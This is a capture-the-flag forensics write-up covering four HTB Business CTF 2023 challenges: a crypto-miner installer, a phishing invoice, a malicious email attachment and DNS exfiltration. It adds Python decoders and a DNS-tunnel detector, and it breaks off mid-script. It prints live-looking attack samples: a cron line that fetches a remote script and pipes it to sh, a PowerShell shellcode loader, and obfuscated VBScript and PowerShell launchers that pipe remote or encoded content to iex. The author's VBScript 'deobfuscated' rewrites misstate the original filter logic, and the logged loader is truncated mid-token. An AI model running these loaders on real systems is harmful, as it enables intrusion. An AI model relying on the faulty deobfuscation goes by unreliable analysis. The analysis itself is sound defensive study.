HTB Business CTF 2023: The Great Escape

Forensics

Red Miners

In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor's miner's installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defences to counter future threats.

forensics_red_miners.zip

Looking at the Bash file, my first thought is to search for HTB since that's typically part of their flag format. One hit is this line:

local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="

Using CyberChef on the base64 portion of the string, we get the following:

part2="_th31r_w4y"

We do the same thing with this line:

echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'

Which gives us:

part1="HTB{m1n1ng"

Those are the only relevant portions mentioning HTB, so next I looked for more base64 usage and found this:

dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)

Which decodes to the final part of the flag:

_t0_m4rs}

Answer: HTB{m1n1ng_th31r_w4y_t0_m4rs}
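
Rather than spotting base64 by eye, the same triage can be scripted. The following is an added Python example, not code from the original write-up or the challenge files: it pulls every well-formed base64 token out of a shell script and keeps only those that decode to printable text, which drops hashes and random identifiers. The sample script is constructed from the three lines quoted above plus one hex-digest line that the filter should reject; the extra handling of `/` is needed because the first token sits at the end of a URL path and `/` is also a base64 character.

```python
import base64
import re
import string

# Constructed stand-in for the installer: the three lines quoted in the write-up
# plus a sha256 line (64 hex chars) that looks like base64 but is not.
SAMPLE_SCRIPT = """\
local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)
echo "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08  ex.sh" | sha256sum -c
"""

# Candidate tokens: runs of the base64 alphabet of at least 12 characters,
# optionally followed by '=' padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
PRINTABLE = set(string.printable)


def _try_decode(token: str):
    """Decode one candidate; None if it is not well-formed base64 or does not
    decode to printable ASCII (binary blobs and misfires are dropped)."""
    if len(token) % 4:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if not decoded or any(ch not in PRINTABLE for ch in decoded):
        return None
    return decoded


def decode_base64_candidates(text: str) -> list:
    """Return (token, decoded_text) pairs for every decodable token in text,
    in the order they appear."""
    found = []
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        # '/' is both a base64 character and a URL path separator, so a run
        # such as "htb/cGFy..." is retried from the character after each '/'.
        starts = [0] + [i + 1 for i, ch in enumerate(token) if ch == "/"]
        for s in starts:
            decoded = _try_decode(token[s:])
            if decoded is not None:
                found.append((token[s:], decoded.rstrip("\n")))
                break
    return found


if __name__ == "__main__":
    for token, decoded in decode_base64_candidates(SAMPLE_SCRIPT):
        print(f"{token} -> {decoded!r}")
```

Run against the real installer, the three decoded strings come out in file order, so the flag parts still have to be put together by their `partN` names rather than by position.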

Scripts and Formulas

After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, the UNZ hired a local geologist to examine possible sites that were used in the past for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! To get the flag you need to answer the questions from the docker instance.

forensics_scripts_and_formulas

After spawning the Docker instance and connecting with nc 83.136.251.112 30317, we get the first question:

  1. What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)

I used PowerShell to do this instead of the Windows Event Viewer GUI. After messing around with it for a while, I came up with the following:

$FormatEnumerationLimit = -1
$OutputFile = "./_matching_events.log"
$WindowWidth = $Host.UI.RawUI.BufferSize.Width

# Delete the file if it exists
if (Test-Path -Path $OutputFile) {
    Remove-Item -Path $OutputFile
}

# Read every log in the current directory and keep events whose message mentions
# a copy or rename; Properties[0]/[1] are the first two event-data fields, whose
# meaning depends on the event ID
Get-WinEvent -Path .\* | ForEach-Object {
    if ($_.Message -match '(copy|rename)') {
        $EventProperties = [PSCustomObject]@{
            TimeCreated     = $_.TimeCreated
            EventID         = $_.Id
            Message         = $_.Message
            ApplicationName = $_.Properties[0].Value
            FilePath        = $_.Properties[1].Value
        }
        $EventProperties | Format-List | Out-String | Out-File -Append -FilePath $OutputFile
        # Separator line between events so the log is easy to scan
        Add-Content -Path $OutputFile -Value ("=" * $WindowWidth)
    }
}

The output had one bit that was pretty interesting right off the bat for event ID 4104:

Creating Scriptblock text (1 of 1):
function func_get_proc_address {
  Param ($var_module, $var_procedure)		
  $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { 
$_.GlobalAssemblyCachGetType('Microsoft.Win32.UnsafeNativeMethods')
  $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] 
@('System.Runtime.InteropServices.Haring'))
  return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 
System.Runtime.InteropSerr_procedure))
}

function func_get_delegate_type {
  Param (
    [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
    [Parameter(Position = 1)] [Type] $var_return_type = [Void]
  )

  $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 
System.Reflection.AssemblyNamestem.MulticastDelegate])
  $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', 
[System.Reflection.CallingConventions]:aged')
  $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, 
$var_parameteaged')

  return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hR
c2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLz
wHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6
YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslL
IiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7Aj
IyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq
+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh
05aBddz2')

for ($x = 0; $x -lt $var_code.Count; $x++) {
  $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = 
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address 
kernel3ntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, 
(func_get_deleoid])))
$var_runme.Invoke([IntPtr]::Zero)


ScriptBlock ID: a161d800-a564-40a3-aad8-4f9e02e966f7

There were a lot of firewall-change events in the logs that were irrelevant to this question, so I changed the if statement to filter them out, which made the remaining output much easier to read through manually:

if ($_.Message -match '(copy|rename)' -and $_.Message -notmatch 'Windows Defender Firewall')

I was able to deobfuscate the VBScript code somewhat. The script as logged is shown first, followed by my two rewriting passes:

Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP
    Dim pJmLeYiULjageWIP
    Dim cMtARTHTmbqbxauA 
    Dim bZzPBAGNtCswuUoo
    Dim QlAtSUbRwRFNlEjX

    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")

    yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY 
SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
    objShell.Run cMtARTHTmbqbxauA
End Function

Function LLdunAaXwVgKfowf(t)
    Dim msStr()
    ReDim msStr(Len(t))
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)
    Next
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
    Next
    LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function

Sub Main()
    ZbVxxAHCsiTnKpIJ()
End Sub

Main()
Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP
    Dim pJmLeYiULjageWIP
    Dim cMtARTHTmbqbxauA
    Dim bZzPBAGNtCswuUoo
    Dim QlAtSUbRwRFNlEjX

    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")

    yNSlalZeGAsokjsP = GetURL("https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqWYwI6x71z4p2EK88FojrsW2DKbSkx-ro5lQ1lB/1.0/9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & GetString("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & GetString("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & GetString("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=") & GetString("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & GetString(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & GetString("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & GetString("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & GetString("YP7aQTYtE3UaYLX[") & "0" & GetString("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & GetString("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & GetString("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & GetString("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & GetString("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & GetString("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 
BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
    objShell.Run cMtARTHTmbqbxauA
End Function

Function GetURL(t)
    Dim msStr()
    ReDim msStr(Len(t))
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)
    Next
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
    Next
    GetURL = jKaNZCemSwPDrmLT
End Function

Sub Main()
    ZbVxxAHCsiTnKpIJ()
End Sub

Main()
Function ZbVxxAHCsiTnKpIJ()
    Dim scriptURL
    Dim command
    Dim shellCommand
    Dim shell

    Set shell = CreateObject("WScript.Shell")

    scriptURL = "https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqWYwI6x71z4p2EK88FojrsW2DKbSkx-ro5lQ1lB/1.0/9pMoBw7eTrMsDhKeVlOl1.WeMxUe"
    command = GetURL(scriptURL)
    shellCommand = command & "|iex"
    shell.Run shellCommand
End Function

Function GetURL(url)
    Dim modifiedURL
    Dim i

    modifiedURL = ""
    For i = 1 To Len(url)
        If IsAlphaNumeric(Mid(url, i, 1)) Then
            modifiedURL = modifiedURL & Mid(url, i, 1)
        End If
    Next

    GetURL = modifiedURL
End Function

Function IsAlphaNumeric(character)
    Dim asciiValue
    asciiValue = Asc(character)

    If (asciiValue >= 48 And asciiValue <= 57) Or _
        (asciiValue >= 65 And asciiValue <= 90) Or _
        (asciiValue >= 97 And asciiValue <= 122) Then
        IsAlphaNumeric = True
    Else
        IsAlphaNumeric = False
    End If
End Function

ZbVxxAHCsiTnKpIJ()
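
The string filter is the whole trick in this sample: LLdunAaXwVgKfowf keeps a character only when LCase() leaves it unchanged and IsNumeric() is false, so every upper-case letter and digit is padding and only lower-case letters and punctuation survive. The following is an added Python example (my code, not the author's rewrite and not the sample's own) that reimplements that rule and evaluates the first concatenation from the logged script, chunk by chunk, exactly as the script joins filtered pieces with the literals "32" and "1.0". The chunk strings are copied from the logged VBScript above; the function names and the FLAGS constant label are mine.

```python
# Python re-implementation of the sample's filter routine (LLdunAaXwVgKfowf):
# keep c only if c == LCase(c) and Not IsNumeric(c). For single characters
# that means upper-case letters and digits are dropped, everything else kept.
def vbs_filter(s: str) -> str:
    return "".join(c for c in s if c == c.lower() and not c.isdigit())


# First expression of ZbVxxAHCsiTnKpIJ, split the way the script concatenates
# it: ("filter", chunk) pieces go through vbs_filter, ("literal", text) pieces
# are appended as-is. Raw strings keep the backslashes literal.
PATH_EXPR = [
    ("filter", r"BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm"),
    ("literal", "32"),
    ("filter", r"V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04"),
    ("literal", "1.0"),
    ("filter", r"\9pMoBw7eTrMsDhKeVlOl1.WeMxUe"),
]

# Second chunk of the command line (the interpreter's switches), copied from
# the logged script.
FLAGS = "EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V "


def evaluate(expr) -> str:
    """Evaluate a list of ("filter"|"literal", text) pieces into one string."""
    return "".join(vbs_filter(v) if kind == "filter" else v for kind, v in expr)


if __name__ == "__main__":
    print("executable:", evaluate(PATH_EXPR))
    print("switches  :", repr(vbs_filter(FLAGS)))
```

The same vbs_filter call decodes every remaining argument of the command line; only the base64 literal and the "0"/"64"/"D"/"V" pieces, which the script appends unfiltered, need to be left alone.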

Hypercraft

This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it's real, or if it's just the Arodorians trying to phish us, and find the flag.

hypercraft.eml

After opening the EML file with Outlook, we can see that there is an attached HTML file, [TOP SECRET] Arodorian Hypercraft.pdf.html. I opened the file in a browser and it automatically downloaded [TOP SECRET]Hypercraft Plans.zip. The ZIP file contained a JavaScript file, [TOP SECRET] Arodorian Hypercraft.pdf.js.

Decoded PowerShell command from JavaScript:

powershell -execution bypass "iex(New-Object System.IO.Compression.DeflateStream( [System.IO.MemoryStream] [convert]::FromBase64String('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'), [System.IO.Compression.CompressionMode]::DECOMPReSS) | ForEach{New-Object IO.StreamReader( $_, [System.Text.Encoding]::Ascii ) } ).readToEnd( )"
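
The launcher above only wraps the real script: base64, then a .NET DeflateStream, then `iex` on the result. To read the inner script you need the decoder half and never the `iex`. The following is an added Python example, not part of the original write-up, that extracts the blob from a launcher of this shape and inflates it offline. The important detail is that DeflateStream emits raw DEFLATE with no zlib header, so zlib must be called with wbits=-15. Because the page's blob is not reproduced here, the example builds its own sample launcher from a harmless constructed inner script; the regular expression assumes the wrapper text has the layout shown above.

```python
import base64
import re
import zlib

# .NET System.IO.Compression.DeflateStream produces raw DEFLATE (RFC 1951),
# no zlib header, so zlib needs a negative window size.
RAW_DEFLATE = -15

# FromBase64String('<blob>') ... CompressionMode]::Decompress. The enum name is
# matched case-insensitively because PowerShell ignores its casing (the sample
# writes it as DECOMPReSS, presumably to dodge naive string matching).
PATTERN = re.compile(
    r"FromBase64String\('([A-Za-z0-9+/=]+)'\).*?CompressionMode\]::decompress",
    re.IGNORECASE | re.DOTALL,
)

# Constructed, harmless inner script used to build the sample launcher.
SAMPLE_INNER = "Write-Host 'constructed stage two'; Get-Date"


def build_sample_launcher(inner_script: str) -> str:
    """Produce a launcher with the same layout as the one in the write-up,
    around a constructed inner script (sample data only)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, RAW_DEFLATE)
    data = comp.compress(inner_script.encode("ascii")) + comp.flush()
    blob = base64.b64encode(data).decode("ascii")
    return (
        'powershell -execution bypass "iex(New-Object System.IO.Compression.DeflateStream( '
        "[System.IO.MemoryStream] [convert]::FromBase64String('" + blob + "'), "
        "[System.IO.Compression.CompressionMode]::DECOMPReSS) | ForEach{New-Object IO.StreamReader( "
        '$_, [System.Text.Encoding]::Ascii ) } ).readToEnd( )"'
    )


def unpack_stage(command: str) -> str:
    """Recover the inner script without executing anything:
    base64 decode, raw inflate, ASCII decode."""
    m = PATTERN.search(command)
    if not m:
        raise ValueError("no FromBase64String(...)/Decompress pattern found")
    raw = base64.b64decode(m.group(1))
    return zlib.decompress(raw, RAW_DEFLATE).decode("ascii")


if __name__ == "__main__":
    launcher = build_sample_launcher(SAMPLE_INNER)
    print(unpack_stage(launcher))
```

If the inner script turns out to be another layer of the same wrapper, call unpack_stage again on the result until plain PowerShell comes out.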

Project Redline

In the aftermath of a mysterious death in the United Nations of Zenium colony on Mars, during the Autopsy, the doctor uncovers a peculiar secret. Traces of a cyber attack are discovered on the victim's cybernetic implants, pointing to a covert infiltration by the Board of Arodor. Determined to reveal the truth, the doctor joins forces with a cyber forensics expert, tracing the attack's origins. As they delve deeper, they uncover a startling revelation. In the implant factory, a worker examined what they thought was leaked footage from Arodors cyber implant research. Unbeknownst to him, the intel was infected with malware, infecting the whole production line. Now, they must race against time to expose cybercriminals and prevent Mars's fragile peace from shattering again.

forensics_project_redline

This one is a bit of a bigger lift to parse through initially, as there are 16475 recorded packets in the capture. Luckily, 16338 (99.2%) are DNS, so we know that's likely how we're going to find the flag. Out of curiosity, I filtered for not dns to see what else there was, and it was all MDNS queries to a linked iPhone. There are a massive number of queries for A records, which is typically indicative of DNS exfil, so I decided to start there.

The site requested was pretending to be a Microsoft domain (https://microsoftcloudservices.com), but some research indicated that it was "malicious" for the purposes of this challenge. The domain was registered exclusively for the 2023 competition, and visiting the root domain redirects to a [Rick Roll](https://www.youtube.com/watch?v=dQw4w9WgXcQ). Attempting to compare the domains being requested over time shows some similarities:
  • The first subdomain, e.g. 6M3iCMhHvXoC8oNGbnbtTJbVfKLsF4nMFqstYU4UowoC8Y5LHJ6TxA95PbBfQ64, is always 64 characters long.
  • The first subdomain also only varies slowly over time, e.g. packet 6135 has the same first 7 characters as packet 1173. This makes me believe that it may be a form of encoded timestamp.
  • The first 3 subdomains are always 64 characters long, and the 4th is always 17 characters.
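
Those regularities (fixed label lengths, long high-entropy labels, a large number of unique names under one domain) are exactly what a DNS-tunnelling detector keys on. The following is an added Python example, not from the write-up or the challenge files, that runs such a check over a constructed set of query names: eight exfil-style names under the reserved domain lookalike.example, built from hex digests so they are reproducible, mixed with ordinary lookups. For each registered domain it reports the query count, how many long labels it saw, the mean Shannon entropy of those labels, and the label-length profile. The thresholds are assumptions chosen for the sample; the "last two labels" rule for the registered domain is a simplification a real tool would replace with the public suffix list.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character (hex text ~3.8, base62 text ~5.5, English words ~3-4)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_lengths(qname: str) -> list:
    """Lengths of the labels of a query name, left to right, ignoring a trailing dot."""
    return [len(label) for label in qname.rstrip(".").split(".")]


def registered_domain(qname: str) -> str:
    """Crude 'last two labels' approximation of the registered domain."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_tunnel_candidates(queries, min_label_len=32, min_queries=5, min_entropy=3.5) -> dict:
    """Group query names by registered domain and flag domains whose subdomain
    labels are long, high-entropy and numerous: the shape of DNS exfil."""
    per_domain = defaultdict(list)
    for q in queries:
        per_domain[registered_domain(q)].append(q.rstrip(".").split("."))
    flagged = {}
    for dom, names in per_domain.items():
        long_labels = [l for labels in names for l in labels[:-2] if len(l) >= min_label_len]
        if len(long_labels) < min_queries:
            continue
        mean_entropy = sum(shannon_entropy(l) for l in long_labels) / len(long_labels)
        if mean_entropy < min_entropy:
            continue
        flagged[dom] = {
            "queries": len(names),
            "long_labels": len(long_labels),
            "unique_long_labels": len(set(long_labels)),
            "mean_entropy": round(mean_entropy, 2),
            # distinct (len(label1), len(label2), ...) shapes seen under this domain
            "length_profile": sorted({tuple(len(l) for l in labels[:-2]) for labels in names}),
        }
    return flagged


def _chunk(i: int, n: int) -> str:
    """Deterministic pseudo-random label of n hex characters (sample data only)."""
    return hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:n]


# Constructed traffic: 8 names shaped 64.64.64.17 under lookalike.example, plus
# ordinary lookups (including an mDNS-style name) that must not be flagged.
SAMPLE_QUERIES = [
    f"{_chunk(i, 64)}.{_chunk(i + 100, 64)}.{_chunk(i + 200, 64)}.{_chunk(i + 300, 17)}.lookalike.example"
    for i in range(8)
] + [
    "www.example.com",
    "mail.example.com",
    "a1b2c3d4e5f6a7b8.cdn.example.net",
    "ocsp.example.org",
    "_companion-link._tcp.local",
]


if __name__ == "__main__":
    for dom, stats in find_tunnel_candidates(SAMPLE_QUERIES).items():
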